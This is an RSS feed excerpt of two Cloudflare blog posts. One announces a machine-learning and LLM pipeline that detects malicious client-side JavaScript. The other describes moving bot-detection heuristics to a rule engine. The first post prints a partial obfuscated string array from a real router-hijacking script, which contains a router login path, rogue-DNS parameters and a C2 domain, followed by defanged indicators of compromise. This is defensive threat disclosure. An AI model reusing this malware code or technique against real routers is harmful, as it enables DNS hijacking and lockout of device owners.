
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title><![CDATA[ The Cloudflare Blog ]]></title>
        <description><![CDATA[ Get the latest news on how products at Cloudflare are built, technologies used, and join the teams helping to build a better Internet. ]]></description>
        <link>https://blog.cloudflare.com</link>
        <atom:link href="https://blog.cloudflare.com/" rel="self" type="application/rss+xml"/>
        <language>en-us</language>
        <image>
            <url>https://blog.cloudflare.com/favicon.png</url>
            <title>The Cloudflare Blog</title>
            <link>https://blog.cloudflare.com</link>
        </image>
        <lastBuildDate>Mon, 13 Apr 2026 13:20:21 GMT</lastBuildDate>
        <item>
            <title><![CDATA[Cloudflare Client-Side Security: smarter detection, now open to everyone]]></title>
            <link>https://blog.cloudflare.com/client-side-security-open-to-everyone/</link>
            <pubDate>Mon, 30 Mar 2026 06:00:00 GMT</pubDate>
            <description><![CDATA[ We are opening our advanced Client-Side Security tools to all users, featuring a new cascading AI detection system. By combining graph neural networks and LLMs, we've reduced false positives by up to 200x while catching sophisticated zero-day exploits. ]]></description>
            <content:encoded><![CDATA[ <p>Client-side skimming attacks have a boring superpower: they can steal data without breaking anything. The page still loads. Checkout still completes. All it takes is a single malicious script tag.</p><p>If that sounds abstract, here are two recent examples of such skimming attacks:</p><ul><li><p>In January 2026, <a href="https://sansec.io/research/keylogger-major-us-bank-employees"><u>Sansec reported</u></a> a browser-side keylogger running on an employee merchandise store for a major U.S. bank, harvesting personal data, login credentials, and credit card information.</p></li><li><p>In September 2025, attackers published malicious releases of <a href="https://blog.cloudflare.com/how-cloudflares-client-side-security-made-the-npm-supply-chain-attack-a-non/"><u>widely used npm packages</u></a>. If those packages were bundled into front-end code, end users could be exposed to crypto-stealing code in the browser.</p></li></ul><p>To further our goal of building a better Internet, Cloudflare established a core tenet during our <a href="https://www.cloudflare.com/innovation-week/birthday-week-2025/"><u>Birthday Week 2025</u></a>: powerful security features should be accessible <a href="https://blog.cloudflare.com/enterprise-grade-features-for-all/"><u>without requiring a sales engagement</u></a>. In pursuit of this objective, we are announcing two key changes today:</p><p>First, Cloudflare <b>Client-Side Security Advanced</b> (formerly <b>Page Shield add-on</b>) is now <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/settings?tabs=client-side-abuse"><u>available to self-serve</u></a> customers. 
And second, domain-based threat intelligence is now complimentary for all customers on the <a href="https://developers.cloudflare.com/page-shield/#availability"><u>free </u><b><u>Client-Side Security</u></b><u> bundle</u></a>.</p><p>In this post, we’ll explain how this product works and highlight a new AI detection system designed to identify malicious JavaScript while minimizing false alarms. We’ll also discuss several real-world applications for these tools.</p>
    <div>
      <h2>How Cloudflare Client-Side Security works</h2>
      <a href="#how-cloudflare-client-side-security-works">
        
      </a>
    </div>
    <p>Cloudflare Client-Side Security assesses 3.5 billion scripts per day, protecting 2,200 scripts per enterprise zone on average.</p><p>Under the hood, Client-Side Security collects these signals using browser reporting (for example, <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP"><u>Content Security Policy</u></a>), which means you don’t need scanners or app instrumentation to get started, and there is zero latency impact to your web applications. The only prerequisite is that your traffic is proxied through Cloudflare.</p><p>Client-Side Security <b>Advanced</b> provides immediate access to powerful security features:</p><ul><li><p><b>Smarter malicious script detection:</b> Using in-house machine learning, this capability is now enhanced with assessments from a Large Language Model (LLM). Read more details below.</p></li><li><p><b>Code change monitoring:</b> Continuous code change detection and monitoring is included, which is essential for meeting compliance requirements such as <a href="https://developers.cloudflare.com/page-shield/reference/pci-dss/"><u>PCI DSS v4</u></a>, requirement 11.6.1.</p></li><li><p><b>Proactive blocking rules:</b> Benefit from positive content security rules that are maintained and enforced through continuous monitoring.</p></li></ul>
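<p>Concretely, browser reporting means the server sends a report-only CSP header, and browsers POST a small JSON document whenever a script or connection violates the policy. The sketch below parses such a report; the field names follow the CSP <code>report-uri</code> report format, while the URLs and the helper function are illustrative, not Cloudflare's pipeline code:</p>

```python
import json

# Shape of a browser-generated CSP violation report (per the CSP
# report-uri format); the values here are illustrative.
raw = json.dumps({
    "csp-report": {
        "document-uri": "https://shop.example/checkout",
        "blocked-uri": "https://evil.example/skimmer.js",
        "violated-directive": "script-src",
    }
})

def extract_script_signal(report_body: str) -> dict:
    """Pull out the fields a client-side security pipeline would inspect."""
    report = json.loads(report_body)["csp-report"]
    return {
        "page": report["document-uri"],
        "script": report["blocked-uri"],
        "directive": report["violated-directive"],
    }

print(extract_script_signal(raw)["script"])  # https://evil.example/skimmer.js
```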
    <div>
      <h2>Detecting JavaScript with malicious intent</h2>
      <a href="#detecting-malicious-intent-javascripts">
        
      </a>
    </div>
    <p>Managing client-side security is a massive data problem. For an average enterprise zone, our systems observe approximately 2,200 unique scripts; smaller business zones frequently handle around 1,000. This volume alone is difficult to manage, but the real challenge is the volatility of the code.</p><p>Roughly a third of these scripts undergo code updates within any 30-day window. If a security team attempted to manually approve every new DOM (document object model) interaction or outbound connection, the resulting overhead would paralyze the development pipeline.</p><p>Instead, our detection strategy focuses on <i>what a script is trying to do</i>. That includes intent classification work <a href="https://blog.cloudflare.com/how-we-train-ai-to-uncover-malicious-javascript-intent-and-make-web-surfing-safer/"><u>we’ve written about previously</u></a>. In short, we analyze the script's behavior using an Abstract Syntax Tree (AST). By breaking the code down into its logical structure, we can identify patterns that signal malicious intent, regardless of how the code is obfuscated.</p>
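<p>To see why an AST-level view survives renaming and minification, consider this toy sketch. It uses Python’s own <code>ast</code> module as a stand-in for a JavaScript parser (our pipeline parses JavaScript, not Python): blanking out identifier names leaves a structural fingerprint that two differently-named variants of the same logic share.</p>

```python
import ast

def structural_fingerprint(source: str) -> str:
    """Serialize the AST with identifier names blanked out, so renaming
    variables does not change the fingerprint."""
    tree = ast.parse(source)
    for node in ast.walk(tree):
        if isinstance(node, ast.Name):
            node.id = "_"  # erase the variable name, keep the structure
    return ast.dump(tree)

# The same collect-then-exfiltrate pattern under two naming schemes:
readable = "payload = collect(); send(payload)"
obfuscated = "_0x1f = _0x9c(); _0x2e(_0x1f)"

print(structural_fingerprint(readable) == structural_fingerprint(obfuscated))  # True
```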
    <div>
      <h2>The high cost of false positives</h2>
      <a href="#the-high-cost-of-false-positives">
        
      </a>
    </div>
    <p>Client-side security operates in a different regime from a Web Application Firewall (WAF), which constantly observes matched attack signatures from the vulnerability scanners that sweep the web. While a WAF blocks high-volume automated attacks around the clock, a client-side compromise (such as a breach of an origin server or a third-party vendor) is a rare, high-impact event, particularly in enterprise environments with rigorous vendor reviews and code scanning.</p><p>This rarity creates a problem. Because real attacks are infrequent, a security system’s detections are statistically more likely to be false positives. For a security team, these false alarms create fatigue and hide real threats. To solve this, we integrated a Large Language Model (LLM) into our detection pipeline, drastically reducing the false positive rate.</p>
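<p>A quick back-of-the-envelope calculation shows how harsh this base-rate effect is. The numbers below are hypothetical, chosen only to illustrate the mechanism:</p>

```python
# Hypothetical base-rate illustration: even a precise detector produces
# mostly false alarms when real attacks are rare. These rates are made up
# for the example, not Cloudflare production figures.
prevalence = 1e-5   # 1 in 100,000 scripts is actually malicious
fpr = 0.003         # detector flags 0.3% of benign scripts
tpr = 0.99          # detector catches 99% of real attacks

# Bayes' rule: P(attack | flagged)
p_flagged = tpr * prevalence + fpr * (1 - prevalence)
p_attack_given_flag = tpr * prevalence / p_flagged

print(f"{p_attack_given_flag:.1%} of alerts correspond to real attacks")
```

With these illustrative rates, well over 99% of alerts would be false alarms, even though the detector itself looks highly accurate in isolation.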
    <div>
      <h2>Adding an LLM-based second opinion for triage</h2>
      <a href="#adding-an-llm-based-second-opinion-for-triage">
        
      </a>
    </div>
    <p>Our <a href="https://blog.cloudflare.com/how-we-train-ai-to-uncover-malicious-javascript-intent-and-make-web-surfing-safer/"><u>frontline detection engine</u></a> is a Graph Neural Network (GNN). GNNs are particularly well-suited for this task: they operate on the Abstract Syntax Tree (AST) of the JavaScript code, learning structural representations that capture execution patterns regardless of variable renaming, minification, or obfuscation. In machine learning terms, the GNN learns an embedding of the code’s graph structure that generalizes across syntactic variations of the same semantic behavior.</p><p>The GNN is tuned for high recall. We want to catch novel, zero-day threats. Its precision is already remarkably high: less than 0.3% of total analyzed traffic is flagged as a false positive (FP). However, at Cloudflare’s scale of <a href="https://blog.cloudflare.com/how-cloudflares-client-side-security-made-the-npm-supply-chain-attack-a-non/"><u>3.5 billion scripts assessed daily</u></a>, even a sub-0.3% FP rate translates to a volume of false alarms that can be disruptive to customers.</p><p>The core issue is a classic class imbalance problem. While we can collect extensive malicious samples, the sheer diversity of benign JavaScript across the web is practically infinite. Heavily obfuscated but perfectly legitimate scripts — like bot challenges, tracking pixels, ad-tech bundles, and minified framework builds — can exhibit structural patterns that overlap with malicious code in the GNN’s learned feature space. As much as we try to cover a huge variety of interesting benign cases, the model simply has not seen enough of this infinite variety during training.</p><p>This is precisely where Large Language Models (LLMs) complement the GNN. 
LLMs possess a deep semantic understanding of real-world JavaScript practices: they recognize domain-specific idioms, common framework patterns, and can distinguish sketchy-but-innocuous obfuscation from genuinely malicious intent.</p><p>Rather than replacing the GNN, we designed a cascading classifier architecture:</p><ol><li><p><b>Every script is first evaluated by the GNN</b>. If the GNN predicts the script as benign, the detection pipeline terminates immediately. <b>This incurs only the minimal latency of the GNN for the vast majority of traffic, completely bypassing the heavier computation time of the LLM</b>.</p></li><li><p>If the GNN flags the script as potentially malicious (above the decision threshold), the script is <b>forwarded to an open-source LLM</b> hosted on Cloudflare <a href="https://developers.cloudflare.com/workers-ai/"><u>Workers AI</u></a> for a second opinion.</p></li><li><p>The LLM, provided with a security-specialized prompt context, <b>semantically evaluates the script’s intent</b>. If it determines the script is benign, it overrides the GNN’s verdict.</p></li></ol><p>This two-stage design gives us the best of both worlds: the GNN’s high recall for structural malicious patterns, combined with the LLM’s broad semantic understanding to filter out false positives.</p>
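<p>The three steps above can be condensed into a few lines. This is a simplified sketch: the callables stand in for the real GNN and the Workers AI model, and the threshold value is illustrative.</p>

```python
from typing import Callable

GNN_THRESHOLD = 0.5  # illustrative decision threshold

def classify(script: str,
             gnn_score: Callable[[str], float],
             llm_says_benign: Callable[[str], bool]) -> str:
    """Cascading classifier: cheap GNN first, LLM only on GNN hits."""
    if gnn_score(script) < GNN_THRESHOLD:
        return "benign"       # stage 1: the vast majority of traffic stops here
    if llm_says_benign(script):
        return "benign"       # stage 2: the LLM overrides the GNN's verdict
    return "malicious"        # both stages agree

# Stub models for demonstration:
verdict = classify("eval(atob('...'))",
                   gnn_score=lambda s: 0.9,
                   llm_says_benign=lambda s: False)
print(verdict)  # malicious
```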
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/438frLuYPU51j0uhtM5foj/10c53b3b3ccc84b00c754c872ad20492/image3.png" />
          </figure><p><a href="https://blog.cloudflare.com/how-we-train-ai-to-uncover-malicious-javascript-intent-and-make-web-surfing-safer/#training-the-model-to-detect-hidden-malicious-intent"><u>As we previously explained</u></a>, our GNN is trained on publicly accessible script URLs, the same scripts any browser would fetch. The LLM inference at runtime runs entirely within Cloudflare’s network via <a href="https://developers.cloudflare.com/workers-ai/"><u>Workers AI</u></a> using open-source models (we currently use <code>gpt-oss-120b</code>).</p><p>As an additional safety net, every script flagged by the GNN is logged to Cloudflare <a href="https://developers.cloudflare.com/r2/"><u>R2</u></a> for later analysis. This allows us to continuously audit whether the LLM’s overrides are correct and catch any edge cases where a true attack might have been inadvertently filtered out. Yes, we dogfood our own storage products for our own ML pipeline.</p><p>The results from our internal evaluations on real production traffic are compelling. Focusing on total analyzed traffic under the JS Integrity threat category, the secondary LLM validation layer reduced false positives by nearly 3x: dropping the already low ~0.3% FP rate down to ~0.1%. When evaluating unique scripts, the impact is even more dramatic: the FP rate plummets by a whopping ~200x, from ~1.39% down to just 0.007%.</p><p>At our scale, cutting the overall false positive rate by two-thirds translates to millions fewer false alarms for our customers every single day. Crucially, our True Positive (actual attack) detection capability includes a fallback mechanism: as noted above, we audit the LLM’s overrides to check for possible true attacks that were filtered by the LLM.</p><p>Because the LLM acts as a highly reliable precision filter in this pipeline, we can now afford to lower the GNN’s decision threshold, making it even more aggressive. 
This means we catch novel, highly obfuscated True Attacks that would have previously fallen just below the detection boundary, all without overwhelming customers with false alarms. In the next phase, we plan to push this even further.</p>
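<p>The reported ratios are easy to sanity-check from the raw rates quoted above:</p>

```python
# Rates quoted in the evaluation above, expressed as fractions.
traffic_fp_before, traffic_fp_after = 0.003, 0.001    # ~0.3% -> ~0.1% of traffic
unique_fp_before, unique_fp_after = 0.0139, 0.00007   # 1.39% -> 0.007% of unique scripts

print(traffic_fp_before / traffic_fp_after)  # ~3x fewer false positives on traffic
print(unique_fp_before / unique_fp_after)    # ~200x fewer on unique scripts
```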
    <div>
      <h3>Catching zero-days in the wild: The <code>core.js</code> router exploit</h3>
      <a href="#catching-zero-days-in-the-wild-the-core-js-router-exploit">
        
      </a>
    </div>
    <p>This two-stage architecture is already proving its worth in the wild. Just recently, our detection pipeline flagged a novel, highly obfuscated malicious script (<code>core.js</code>) targeting users in specific regions.</p><p>In this case, the payload was engineered to commandeer home routers (specifically Xiaomi OpenWrt-based devices). Upon closer inspection via deobfuscation, the script demonstrated significant situational awareness: it queries the router's WAN configuration (dynamically adapting its payload using parameters like <code>wanType=dhcp</code>, <code>wanType=static</code>, and <code>wanType=pppoe</code>), overwrites the DNS settings to hijack traffic through Chinese public DNS servers, and even attempts to lock out the legitimate owner by silently changing the admin password. Instead of compromising a website directly, it had been injected into users' sessions via compromised browser extensions.</p><p>To evade detection, the script's core logic was heavily minified and packed using an array string obfuscator — a classic trick, but effective enough that traditional threat intelligence platforms like VirusTotal have not yet reported detections at the time of this writing.</p><p><b>Our GNN successfully revealed</b> the underlying malicious structure despite the obfuscation, and the <b>Workers AI LLM confidently confirmed</b> the intent. Here is a glimpse of the payload showing the target router API and the attempt to inject a rogue DNS server:</p>
            <pre><code>const _0x1581=['bXhqw','=sSMS9WQ3RXc','cookie','qvRuU','pDhcS','WcQJy','lnqIe','oagRd','PtPlD','catch','defaultUrl','rgXPslXN','9g3KxI1b','123123123','zJvhA','content','dMoLJ','getTime','charAt','floor','wZXps','value','QBPVX','eJOgP','WElmE','OmOVF','httpOnly','split','userAgent','/?code=10&amp;asyn=0&amp;auth=','nonce=','dsgAq','VwEvU','==wb1kHb9g3KxI1b','cNdLa','W748oghc9TefbwK','_keyStr','parse','BMvDU','JYBSl','SoGNb','vJVMrgXPslXN','=Y2KwETdSl2b','816857iPOqmf','uexax','uYTur','LgIeF','OwlgF','VkYlw','nVRZT','110594AvIQbs','LDJfR','daPLo','pGkLa','nbWlm','responseText','20251212','EKjNN','65kNANAl','.js','94963VsBvZg','WuMYz','domain','tvSin','length','UBDtu','pfChN','1TYbnhd','charCodeAt','/cgi-bin/luci/api/xqsystem/login','http://192.168.','trace','https://api.qpft5.com','&amp;newPwd=','mWHpj','wanType','XeEyM','YFBnm','RbRon','xI1bxI1b','fBjZQ','shift','=8yL1kHb9g3KxI1b','http://','LhGKV','AYVJu','zXrRK','status','OQjnd','response','AOBSe','eTgcy','cEKWR','&amp;dns2=','fzdsr','filter','FQXXx','Kasen','faDeG','vYnzx','Fyuiu','379787JKBNWn','xiroy','mType','arGpo','UFKvk','tvTxu','ybLQp','EZaSC','UXETL','IRtxh','HTnda','trim','/fee','=82bv92bv92b','BGPKb','BzpiL','MYDEF','lastIndexOf','wypgk','KQMDB','INQtL','YiwmN','SYrdY','qlREc','MetQp','Wfvfh','init','/ds','HgEOZ','mfsQG','address','cDxLQ','owmLP','IuNCv','=syKxEjUS92b','then','createOffer','aCags','tJHgQ','JIoFh','setItem','ABCDEFGHJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789','Kwshb','ETDWH','0KcgeX92i0efbwK','stringify','295986XNqmjG','zfJMl','platform','NKhtt','onreadystatechange','88888888','push','cJVJO','XPOwd','gvhyl','ceZnn','fromCharCode',';Secure','452114LDbVEo','vXkmg','open','indexOf','UiXXo','yyUvu','ddp','jHYBZ','iNWCL','info','reverse','i4Q18Pro9TefbwK','mAPen','3960IiTopc','spOcD','dbKAM','ZzULq','bind','GBSxL','=A3QGRFZxZ2d','toUpperCase','AvQeJ','diWqV','iXtgM','lbQFd','iOS','zVowQ','jTeAP','wanType=dhcp&amp;autoset=1&amp;dns1=','fNKHB','nGkgt','aiEOB','d
pwWd','yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW','encode','gWYAY','mckDW','createDataChannel'];
const _0x4b08=function(_0x5cc416,_0x2b0c4c){_0x5cc416=_0x5cc416-0x1d5;let _0xd00112=_0x1581[_0x5cc416];return _0xd00112;};
(function(_0x3ff841,_0x4d6f8b){const _0x45acd8=_0x4b08;while(!![]){try{const _0x1933aa=-parseInt(_0x45acd8(0x275))*-parseInt(_0x45acd8(0x264))+-parseInt(_0x45acd8(0x1ff))+parseInt(_0x45acd8(0x25d))+-parseInt(_0x45acd8(0x297))+parseInt(_0x45acd8(0x20c))+parseInt(_0x45acd8(0x26e))+-parseInt(_0x45acd8(0x219))*parseInt(_0x45acd8(0x26c));if(_0x1933aa===_0x4d6f8b)break;else _0x3ff841['push'](_0x3ff841['shift']());}catch(_0x8e5119){_0x3ff841['push'](_0x3ff841['shift']());}}}(_0x1581,0x842ab));</code></pre>
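<p>For readers unfamiliar with this obfuscation style, its mechanics reduce to a simple idea: every string literal is moved into one shared array (often rotated at load time until a checksum matches), and each call site becomes an offset lookup, so keywords like <code>cookie</code> never appear at the point of use. Here is a toy Python reconstruction of the lookup using a few strings from the sample above; the array contents and index are illustrative, and only the constant offset mirrors the sample’s <code>_0x4b08</code> helper:</p>

```python
# Toy reconstruction of an array-string obfuscator's runtime lookup.
# Real samples hold hundreds of strings and rotate the array first.
_strings = ["cookie", "userAgent", "http://192.168.", "&dns2="]
OFFSET = 0x1d5  # indices at call sites are shifted by a constant

def lookup(index: int) -> str:
    """What the sample's _0x4b08 helper does, minus the array rotation."""
    return _strings[index - OFFSET]

# A deobfuscated call site: lookup(0x1d7) is really the router IP prefix.
print(lookup(0x1d7))  # http://192.168.
```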
            <p>This is exactly the kind of sophisticated, zero-day threat that a static signature-based WAF would miss but our structural and semantic AI approach catches.</p>
    <div>
      <h4>Indicators of Compromise (IOCs)</h4>
      <a href="#indicators-of-compromise-iocs">
        
      </a>
    </div>
    <ul><li><p><b>URL:</b> hxxps://ns[.]qpft5[.]com/ads/core[.]js</p></li><li><p><b>SHA-256:</b> 4f2b7d46148b786fae75ab511dc27b6a530f63669d4fe9908e5f22801dea9202</p></li><li><p><b>C2 Domain:</b> hxxps://api[.]qpft5[.]com</p></li></ul>
    <div>
      <h2>Domain-based threat intelligence free for all</h2>
      <a href="#domain-based-threat-intelligence-free-for-all">
        
      </a>
    </div>
    <p>Today we are making domain-based threat intelligence available to all Cloudflare Client-Side Security customers, regardless of whether you use the Advanced offering.</p><p>In 2025, we saw many non-enterprise customers affected by client-side attacks, particularly those customers running webshops on the Magento platform. These attacks persisted for days or even weeks after they were publicized. Small and medium-sized companies often lack the enterprise-level resources and expertise needed to maintain a high security standard.</p><p>By providing domain-based threat intelligence to everyone, we give site owners a critical, direct signal of attacks affecting their users. This information allows them to take immediate action to clean up their site and investigate potential origin compromises.</p><p>To begin, simply enable Client-Side Security with a toggle <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/settings?tabs=client-side-abuse"><u>in the dashboard</u></a>. We will then highlight any JavaScript or connections associated with a known malicious domain.</p>
    <div>
      <h2>Get started with Client-Side Security Advanced for PCI DSS v4</h2>
      <a href="#get-started-with-client-side-security-advanced-for-pci-dss-v4">
        
      </a>
    </div>
    <p>To learn more about Client-Side Security Advanced pricing, please visit <a href="https://www.cloudflare.com/plans/"><u>the plans page</u></a>. Before committing, we will estimate the cost based on your last month’s HTTP requests, so you know exactly what to expect.</p><p>Client-Side Security Advanced has all the tools you need to meet the requirements <a href="https://developers.cloudflare.com/page-shield/reference/pci-dss/"><u>of PCI DSS v4</u></a> as an e-commerce merchant, particularly 6.4.3 and 11.6.1. Sign up today <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/settings?tabs=client-side-abuse"><u>in the dashboard</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[JavaScript]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">6NYXSzUcRxDdj9UP0kouAK</guid>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Juan Miguel Cejuela</dc:creator>
        </item>
        <item>
            <title><![CDATA[Improved Bot Management flexibility and visibility with new high-precision heuristics]]></title>
            <link>https://blog.cloudflare.com/bots-heuristics/</link>
            <pubDate>Wed, 19 Mar 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ By building and integrating a new heuristics framework into the Cloudflare Ruleset Engine, we now have a more flexible system to write rules and deploy new releases rapidly. ]]></description>
            <content:encoded><![CDATA[ <p>Within the Cloudflare Application Security team, every <a href="https://www.cloudflare.com/learning/ai/what-is-machine-learning/"><u>machine learning</u></a> model we use is underpinned by a rich set of static rules that serve as a ground truth and a baseline comparison for how our models are performing. These are called heuristics. Our Bot Management heuristics engine has served as an important part of eight global <a href="https://developers.cloudflare.com/bots/concepts/bot-score/#machine-learning"><u>machine learning (ML) models</u></a>, but we needed a more expressive engine to increase our accuracy. In this post, we’ll review how we solved this by moving our heuristics to the Cloudflare <a href="https://developers.cloudflare.com/ruleset-engine/"><u>Ruleset Engine</u></a>. Not only did this give us the platform we needed to write more nuanced rules, it also made our system simpler and safer, and gave <a href="https://www.cloudflare.com/application-services/products/bot-management/"><u>Bot Management</u></a> customers more flexibility and visibility into their bot traffic. </p>
    <div>
      <h3>Bot detection via simple heuristics</h3>
      <a href="#bot-detection-via-simple-heuristics">
        
      </a>
    </div>
    <p>In Cloudflare’s bot detection, we build heuristics from attributes like software library fingerprints, HTTP request characteristics, and internal threat intelligence. Heuristics serve three separate purposes for bot detection: </p><ol><li><p>Bot identification: If traffic matches a heuristic, we can identify the traffic as definitely automated traffic (with a <a href="https://developers.cloudflare.com/bots/concepts/bot-score/"><u>bot score</u></a> of 1) without the need for a machine learning model. </p></li><li><p>Train ML models: When traffic matches our heuristics, we create labelled datasets of bot traffic to train new models. We’ll use many different sources of labelled bot traffic to train a new model, but our heuristics datasets are one of the highest confidence datasets available to us. </p></li><li><p>Validate models: We benchmark any new model candidate’s performance against our heuristic detections (among many other checks) to make sure it meets a required level of accuracy.</p></li></ol><p>While the existing heuristics engine has worked very well for us, as bots evolved we needed the flexibility to write increasingly complex rules. Unfortunately, such rules were not easily supported in the old engine. Customers have also been asking for more details about which specific heuristic caught a request, and for the flexibility to enforce different policies per heuristic ID. We found that by building a new heuristics framework integrated into the Cloudflare Ruleset Engine, we could build a more flexible system to write rules and give Bot Management customers the granular explainability and control they were asking for. </p>
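<p>In code, the identification role looks roughly like the sketch below. The schema, the detection ID, and the example rule are illustrative stand-ins, not our internal implementation:</p>

```python
def score_request(request: dict, heuristics: list) -> dict:
    """Return bot score 1 plus the matching heuristic's ID, or defer to ML."""
    for h in heuristics:
        if h["match"](request):
            return {"bot_score": 1, "detection_id": h["id"]}
    return {"bot_score": None, "defer_to_ml": True}

heuristics = [
    # Illustrative rule: an empty User-Agent is definitely automated.
    {"id": 201_000_001, "match": lambda r: r.get("user_agent", "") == ""},
]

print(score_request({"user_agent": ""}, heuristics))
```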
    <div>
      <h3>The need for more efficient, precise rules</h3>
      <a href="#the-need-for-more-efficient-precise-rules">
        
      </a>
    </div>
    <p>In our previous heuristics engine, we wrote rules in <a href="https://www.lua.org/"><u>Lua</u></a> as part of our <a href="https://openresty.org/"><u>OpenResty</u></a>-based reverse proxy. The Lua-based engine was limited to a very small number of characteristics in a rule because of the high engineering cost we observed with adding more complexity.</p><p>With Lua, we would write fairly simple logic to match on specific characteristics of a request (e.g. user agent). Creating new heuristics of an existing class was fairly straightforward: all we had to do was define another instance of the existing class in our database. However, if we observed malicious traffic that required more than two characteristics (as a simple example, user-agent and <a href="https://en.wikipedia.org/wiki/Autonomous_system_(Internet)"><u>ASN</u></a>) to identify, we’d need to create bespoke logic for detections. Because our Lua heuristics engine was bundled with the code that ran ML models and other important logic, all changes had to go through the same review and release process. If we identified malicious traffic that needed a new heuristic class, and we were also blocked by pending changes in the codebase, we’d be forced to either wait or roll back the changes. If we’re writing a new rule for an “under attack” scenario, every extra minute it takes to deploy a new rule can mean an unacceptable impact to our customer’s business. </p><p>More critical than time to deploy is the complexity that the heuristics engine supports. The old heuristics engine only supported using specific request attributes when creating a new rule. As bots became more sophisticated, we found we had to reject an increasing number of new heuristic candidates because we weren’t able to write precise enough rules. For example, we found a <a href="https://go.dev/"><u>Golang</u></a> TLS fingerprint frequently used by bots and by a small number of corporate VPNs. 
We couldn’t block the bots without stopping the legitimate VPN usage as well, because the old heuristics platform lacked the flexibility to quickly compile sufficiently nuanced rules. Luckily, we already had the perfect solution in the Cloudflare Ruleset Engine. </p>
    <div>
      <h3>Our new heuristics engine</h3>
      <a href="#our-new-heuristics-engine">
        
      </a>
    </div>
    <p>The Ruleset Engine is familiar to anyone who has written a WAF rule, Load Balancing rule, or Transform rule, <a href="https://blog.cloudflare.com/announcing-firewall-rules/"><u>just to name a few</u></a>. For Bot Management, the Wireshark-inspired syntax allows us to quickly write heuristics with much greater flexibility to vastly improve accuracy. We can write a rule in <a href="https://yaml.org/"><u>YAML</u></a> that includes arbitrary sub-conditions and inherit the same framework the WAF team uses, which both ensures any new rule undergoes a rigorous testing process and lets us rapidly release new rules to stop attacks in real time. </p><p>Writing heuristics on the Cloudflare Ruleset Engine allows our engineers and analysts to write new rules in an easy-to-understand YAML syntax. This is critical to supporting a rapid response in under-attack scenarios, especially as we support greater rule complexity. Here’s a simple rule using the new engine, to detect empty user-agents restricted to a specific JA4 fingerprint (right), compared to the empty user-agent detection in the old Lua-based system (left): </p><table><tr><td><p><b>Old</b></p></td><td><p><b>New</b></p></td></tr><tr><td><p><code>local _M = {}</code></p><p><code>local EmptyUserAgentHeuristic = {</code></p><p><code>   heuristic = {},</code></p><p><code>}</code></p><p><code>EmptyUserAgentHeuristic.__index = EmptyUserAgentHeuristic</code></p><p><code>--- Creates and returns empty user agent heuristic</code></p><p><code>-- @param params table contains parameters injected into EmptyUserAgentHeuristic</code></p><p><code>-- @return EmptyUserAgentHeuristic table</code></p><p><code>function _M.new(params)</code></p><p><code>   return setmetatable(params, EmptyUserAgentHeuristic)</code></p><p><code>end</code></p><p><code>--- Adds heuristic to be used for inference in `detect` method</code></p><p><code>-- @param heuristic schema.Heuristic table</code></p><p><code>function 
EmptyUserAgentHeuristic:add(heuristic)</code></p><p><code>   self.heuristic = heuristic</code></p><p><code>end</code></p><p><code>--- Detect runs empty user agent heuristic detection</code></p><p><code>-- @param ctx context of request</code></p><p><code>-- @return schema.Heuristic table on successful detection or nil otherwise</code></p><p><code>function EmptyUserAgentHeuristic:detect(ctx)</code></p><p><code>   local ua = ctx.user_agent</code></p><p><code>   if not ua or ua == '' then</code></p><p><code>      return self.heuristic</code></p><p><code>   end</code></p><p><code>end</code></p><p><code>return _M</code></p></td><td><p><code>ref: empty-user-agent</code></p><p><code>      description: Empty or missing </code></p><p><code>User-Agent header</code></p><p><code>      action: add_bot_detection</code></p><p><code>      action_parameters:</code></p><p><code>        active_mode: false</code></p><p><code>      expression: http.user_agent eq </code></p><p><code>"" and cf.bot_management.ja4 eq "t13d1516h2_8daaf6152771_b186095e22b6"</code></p></td></tr></table><p>The Golang heuristic that captured corporate proxy traffic as well (mentioned above) was one of the first to migrate to the new Ruleset engine. Before the migration, traffic matching this heuristic had a false positive rate of 0.01%. While that sounds like a very small number, this means for every million bots we block, 100 real users saw a Cloudflare challenge page unnecessarily. At Cloudflare scale, even small issues can have real, negative impact.</p><p>When we analyzed the traffic caught by this heuristic rule in depth, we saw the vast majority of attack traffic came from a small number of abusive networks. After narrowing the definition of the heuristic to flag the Golang fingerprint only when it’s sourced from the abusive networks, the rule now has a false positive rate of 0.0001% (one out of one million). 
Updating the heuristic to include the network context improved our accuracy, while still blocking millions of bots every week and giving us plenty of training data for our bot detection models. Because this heuristic is now more accurate, newer ML models make more accurate decisions on what’s a bot and what isn’t.</p>
    <div>
      <h3>New visibility and flexibility for Bot Management customers </h3>
      <a href="#new-visibility-and-flexibility-for-bot-management-customers">
        
      </a>
    </div>
    <p>While the new heuristics engine provides more accurate detections for all customers and a better experience for our analysts, moving to the Cloudflare Ruleset Engine also allows us to deliver new functionality for Enterprise Bot Management customers, starting with greater visibility via a new field called Bot Detection IDs. Every heuristic we use includes a unique Bot Detection ID. These are visible to Bot Management customers in analytics, logs, and firewall events, and they can be used in the firewall to write precise rules for individual bots. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3cYXHw8tFUjdJQGm93gFcE/0a3f6ab89a70410ebb7dd2c6f4f3a677/1.png" />
          </figure>
          <figure>
